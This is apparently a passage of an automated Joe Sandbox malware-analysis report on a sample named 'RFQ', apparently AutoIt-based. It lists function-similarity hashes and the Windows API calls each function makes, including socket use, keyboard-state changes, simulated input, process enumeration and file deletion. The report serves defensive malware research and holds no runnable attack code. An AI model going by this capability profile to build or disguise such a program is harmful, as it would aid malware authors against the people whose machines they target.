                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                            • String ID: %s%d
                                                                            • API String ID: 1272988791-1110647743
                                                                            • Opcode ID: 701497e798b473a1c7e6e14fb17ba0a9f93f7b50166589bc7e10d89f72057676
                                                                            • Instruction ID: dad6d5f9069ff5640782a5b9cb4aa48dcb434e144e1f56c73c10785249a58368
                                                                            • Opcode Fuzzy Hash: 701497e798b473a1c7e6e14fb17ba0a9f93f7b50166589bc7e10d89f72057676
                                                                            • Instruction Fuzzy Hash: DD11D5712403069BCF51BFB5CCD6AFD37AFAF84314F148069F90A97292DE3499458B64
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007157F6
                                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00715823
                                                                            • DrawMenuBar.USER32(?), ref: 00715832
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$InfoItem$Draw
                                                                            • String ID: 0
                                                                            • API String ID: 3227129158-4108050209
                                                                            • Opcode ID: 36777450ee8780311aee8e189efd142e3b62bb57778df03a476adc0920bed71d
                                                                            • Instruction ID: a6837595de603d2396ce30d8b4677afb6c39588900a37fe20263a38ef1ed0293
                                                                            • Opcode Fuzzy Hash: 36777450ee8780311aee8e189efd142e3b62bb57778df03a476adc0920bed71d
                                                                            • Instruction Fuzzy Hash: 76018031600218EFDB519F58DC44BEA7BB9FF85350F10C0A9E849D6190DB3889D4EF21
                                                                            APIs
                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 006E0A67
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Message
                                                                            • String ID: AutoIt$Error allocating memory.$un
                                                                            • API String ID: 2030045667-3912188382
                                                                            • Opcode ID: 56baec85e72d698f6e299b7049fdf1277ba8c71fc8d13e06fe4540aff2c64da1
                                                                            • Instruction ID: 0ab63a595f30bb6c923c579989d033399f7a7acabc52fb2141954fc916557838
                                                                            • Opcode Fuzzy Hash: 56baec85e72d698f6e299b7049fdf1277ba8c71fc8d13e06fe4540aff2c64da1
                                                                            • Instruction Fuzzy Hash: AEE0483238535867D75537D8BC43FC97A898F09B11F60442DF748A55C38FD668D0469D
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInitInitializeUninitialize
                                                                            • String ID:
                                                                            • API String ID: 1998397398-0
                                                                            • Opcode ID: f6a3db825102a61fa19359f741b91c27e2127a5de82d8459b0dee73e7a3aa61b
                                                                            • Instruction ID: 2391d4dae5e91e60de6f10448ad9c22a78ae37b4a8572c7cf98992cf4949f0a7
                                                                            • Opcode Fuzzy Hash: f6a3db825102a61fa19359f741b91c27e2127a5de82d8459b0dee73e7a3aa61b
                                                                            • Instruction Fuzzy Hash: 71A11875604300DFC741EF64C885A2AB7EAEF89710F04865DFA899B3A1CB75ED01CB56
                                                                            APIs
                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0071FC24,?), ref: 006E04D9
                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0071FC24,?), ref: 006E04F1
                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,0071D108,000000FF,?,00000000,00000800,00000000,?,0071FC24,?), ref: 006E0516
                                                                            • _memcmp.LIBVCRUNTIME ref: 006E0537
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                            • String ID:
                                                                            • API String ID: 314563124-0
                                                                            • Opcode ID: 27314fa19b4190ca224874f734ea00b88e5b7f17558d56089c07d227436012d1
                                                                            • Instruction ID: f6ba4496e3eb059d4cf46a78dd5af4de835ae1b2d741e630460ccffab0f90d42
                                                                            • Opcode Fuzzy Hash: 27314fa19b4190ca224874f734ea00b88e5b7f17558d56089c07d227436012d1
                                                                            • Instruction Fuzzy Hash: F2811B71A00209EFDB04DF95C984EEEB7BAFF89315F204558E506AB250DB71AE46CF60
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _free
                                                                            • String ID:
                                                                            • API String ID: 269201875-0
                                                                            • Opcode ID: 18375251047b29b90978f80421d81fa75bce0dd81c32d460921b8f1c1674d007
                                                                            • Instruction ID: d5a677e296b62a7e982ce53985adb5fbddf89f0907480204ca8346b53a93e68c
                                                                            • Opcode Fuzzy Hash: 18375251047b29b90978f80421d81fa75bce0dd81c32d460921b8f1c1674d007
                                                                            • Instruction Fuzzy Hash: 3D412771640650AADB687BF98C45FFE3AE7EF43720F14822DF418DA293DA384D4147A6
                                                                            APIs
                                                                            • GetWindowRect.USER32(0135E510,?), ref: 007161B0
                                                                            • ScreenToClient.USER32(?,?), ref: 007161E3
                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00716250
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientMoveRectScreen
                                                                            • String ID:
                                                                            • API String ID: 3880355969-0
                                                                            • Opcode ID: 1c9e28893e495e76a9c00e6c2c704156c50c21b8b941f4f3dbfef53992b45c62
                                                                            • Instruction ID: ad19385c9f8e34e480b53d9b2c1f1364f497693b45cdc65f052bd73d8e6979b2
                                                                            • Opcode Fuzzy Hash: 1c9e28893e495e76a9c00e6c2c704156c50c21b8b941f4f3dbfef53992b45c62
                                                                            • Instruction Fuzzy Hash: 20513B74A00249AFCF15DF98C880AEE7BB6FF54360F108159F9559B290D774EE81CB90
                                                                            APIs
                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00701A24
                                                                            • WSAGetLastError.WSOCK32 ref: 00701A32
                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00701AB1
                                                                            • WSAGetLastError.WSOCK32 ref: 00701ABB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$socket
                                                                            • String ID:
                                                                            • API String ID: 1881357543-0
                                                                            • Opcode ID: 19377e708d22560e72ce2cb847b9c099e29b3e6506d12d4f3833f573b5d5d36e
                                                                            • Instruction ID: 5f3ff282dd62eecd8b251ba20f98367255521018b62d5f10950348ad71c169ba
                                                                            • Opcode Fuzzy Hash: 19377e708d22560e72ce2cb847b9c099e29b3e6506d12d4f3833f573b5d5d36e
                                                                            • Instruction Fuzzy Hash: 7A41BC74600200AFE720AF64C886F2A37E6AF45718F94C15CF92A9F7D2C676ED41CB94
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 01089f7f2b9f190f0901f8084d4f02b3f935f2074a55612ac686f04488cfaa05
                                                                            • Instruction ID: ffa70ceee5e094239495bc901d4cbbf3cfefb114908751a9d79c7439b2e7c021
                                                                            • Opcode Fuzzy Hash: 01089f7f2b9f190f0901f8084d4f02b3f935f2074a55612ac686f04488cfaa05
                                                                            • Instruction Fuzzy Hash: FA41EAB1600714AFD724AF78C841BEA7BEAEB89710F10553EF151DB282D7B599818B84
                                                                            APIs
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 006F56A1
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 006F56C7
                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 006F56EC
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 006F5718
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 3321077145-0
                                                                            • Opcode ID: a0ea241e2672cc4b1303b7e3b628cae9d465651580eb3b26c9df669afb331391
                                                                            • Instruction ID: 19ef41aca9419a6efdce15934b5d4951003f154e4050a01e22bbd8a5c4810750
                                                                            • Opcode Fuzzy Hash: a0ea241e2672cc4b1303b7e3b628cae9d465651580eb3b26c9df669afb331391
                                                                            • Instruction Fuzzy Hash: C9413D35600610DFCB11EF55C445A5DBBE2FF89720B58C488EA4AAB3A2CB75FD01CB95
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,006A6D01,00000000,00000000,006A8269,?,006A8269,?,00000001,006A6D01,8BE85006,00000001,006A8269,006A8269), ref: 006BD8B0
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 006BD939
                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 006BD94B
                                                                            • __freea.LIBCMT ref: 006BD954
                                                                              • Part of subcall function 006B37B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,0069FD75,?,?,0068B63D,00000000,?,?,?,006F106C,0071D0D0,?,006C242E), ref: 006B37E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                            • String ID:
                                                                            • API String ID: 2652629310-0
                                                                            • Opcode ID: a9b1811f972dd79117cf37ad7df17a30cb5b4588fb308a807395cad6161c8c19
                                                                            • Instruction ID: 5c767054f54e6c3d1e7b7cf90c460efab2b5a8040b2d1835d911651ce0de3017
                                                                            • Opcode Fuzzy Hash: a9b1811f972dd79117cf37ad7df17a30cb5b4588fb308a807395cad6161c8c19
                                                                            • Instruction Fuzzy Hash: 7231D2B2A0021AABDB259F64CC45EEE7BA6EF41714F04412CFD14DB251EB35DD90CB90
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00715287
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 007152AA
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007152B7
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007152DD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: LongWindow$InvalidateMessageRectSend
                                                                            • String ID:
                                                                            • API String ID: 3340791633-0
                                                                            • Opcode ID: 31c032bc9a960b786ce206e4c5abfe912c0519ad8ca551bc79267845c69e28ec
                                                                            • Instruction ID: 0b9df4ce3467cc7d1a48dff07b7cc4739a1d98359e185e69c1af7b07afbf377f
                                                                            • Opcode Fuzzy Hash: 31c032bc9a960b786ce206e4c5abfe912c0519ad8ca551bc79267845c69e28ec
                                                                            • Instruction Fuzzy Hash: 8531C476A91A08FFEF399E5CCC46BE83761BB85750F548102F611972E1C37CA9C09B45
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 006EAB0F
                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 006EAB2B
                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 006EAB92
                                                                            • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 006EABE4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: 688b63ef2ee4637e5f2ae7d36e986f6b9beec87af3bab645bbd12c235d67f164
                                                                            • Instruction ID: 970599f940ca3f3e0d2de08f90c9058000f53495f1e2cf4688737b3c8bcd876e
                                                                            • Opcode Fuzzy Hash: 688b63ef2ee4637e5f2ae7d36e986f6b9beec87af3bab645bbd12c235d67f164
                                                                            • Instruction Fuzzy Hash: F1315E30941398AEFF318BAACC05BFE7B7BAF44320F04835EE491562D1C378A9568756
                                                                            APIs
                                                                            • ClientToScreen.USER32(?,?), ref: 00717569
                                                                            • GetWindowRect.USER32(?,?), ref: 007175DF
                                                                            • PtInRect.USER32(?,?,00718A7B), ref: 007175EF
                                                                            • MessageBeep.USER32(00000000), ref: 0071765B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 1352109105-0
                                                                            • Opcode ID: fd74258eef50b6a628de2519bb91275620cd887a4e5d76c3d897685676582977
                                                                            • Instruction ID: 2a40915a2037378f22a0e2939936be113ad86a50680aed165714fb2ed1b4e58c
                                                                            • Opcode Fuzzy Hash: fd74258eef50b6a628de2519bb91275620cd887a4e5d76c3d897685676582977
                                                                            • Instruction Fuzzy Hash: 90418970A08615DFCB09CF9CD884FE9B7F6BB49311F5580A9E8149B2A1C778ED81CB90
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 0071161E
                                                                              • Part of subcall function 006E3985: GetWindowThreadProcessId.USER32(?,00000000), ref: 006E399F
                                                                              • Part of subcall function 006E3985: GetCurrentThreadId.KERNEL32 ref: 006E39A6
                                                                              • Part of subcall function 006E3985: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006E24F7), ref: 006E39AD
                                                                            • GetCaretPos.USER32(?), ref: 00711632
                                                                            • ClientToScreen.USER32(00000000,?), ref: 0071167F
                                                                            • GetForegroundWindow.USER32 ref: 00711685
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                            • String ID:
                                                                            • API String ID: 2759813231-0
                                                                            • Opcode ID: 7144f0a6c81d9d3341899607ecfe8b4e2e3df4bc73716b3edbc0e33524adc3d7
                                                                            • Instruction ID: ea6353e5d4abd5e227d1721fe606b3560cddd07ed6044e43087739619a33bffe
                                                                            • Opcode Fuzzy Hash: 7144f0a6c81d9d3341899607ecfe8b4e2e3df4bc73716b3edbc0e33524adc3d7
                                                                            • Instruction Fuzzy Hash: 1C317071D00209AFC704EFA9C8818EEBBFDEF89304B54806EE515E7252DB359E45CBA4
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 006ED41F
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 006ED42D
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 006ED44D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006ED4FA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 420147892-0
                                                                            • Opcode ID: 5e3b7041493e0bf3eefc82d8f95613179fdf3f84f068cb2418938ae072e6a36d
                                                                            • Instruction ID: e83a8e58b36f7ccde1160e9f29b26dca47d612e79b30f0fdd434de0727ad4684
                                                                            • Opcode Fuzzy Hash: 5e3b7041493e0bf3eefc82d8f95613179fdf3f84f068cb2418938ae072e6a36d
                                                                            • Instruction Fuzzy Hash: CC31D4710083409FC301EF55C885AAFBBF9EF99350F00062DF581862E1EBB0AA49CB96
                                                                            APIs
                                                                              • Part of subcall function 0069B021: GetWindowLongW.USER32(?,000000EB), ref: 0069B032
                                                                            • GetCursorPos.USER32(?), ref: 00718EF3
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,006D80CE,?,?,?,?,?), ref: 00718F08
                                                                            • GetCursorPos.USER32(?), ref: 00718F50
                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,006D80CE,?,?,?), ref: 00718F86
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                            • String ID:
                                                                            • API String ID: 2864067406-0
                                                                            • Opcode ID: 0251ab3c7451ad62721ae12d4621c9e77b6f9d87b57aa299f368144f756356a2
                                                                            • Instruction ID: 17487a444296ee5d8c96817aaaf095541f5ce4ae5f8b57a3e486d06d4fd8ff56
                                                                            • Opcode Fuzzy Hash: 0251ab3c7451ad62721ae12d4621c9e77b6f9d87b57aa299f368144f756356a2
                                                                            • Instruction Fuzzy Hash: 9C21F135100008AFDB22CF98C858EFA7BBAEB0A321F048165F902471E1C739AD92DB61
                                                                            APIs
                                                                            • GetFileAttributesW.KERNEL32(?,0071D034), ref: 006ED219
                                                                            • GetLastError.KERNEL32 ref: 006ED228
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 006ED237
                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0071D034), ref: 006ED294
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
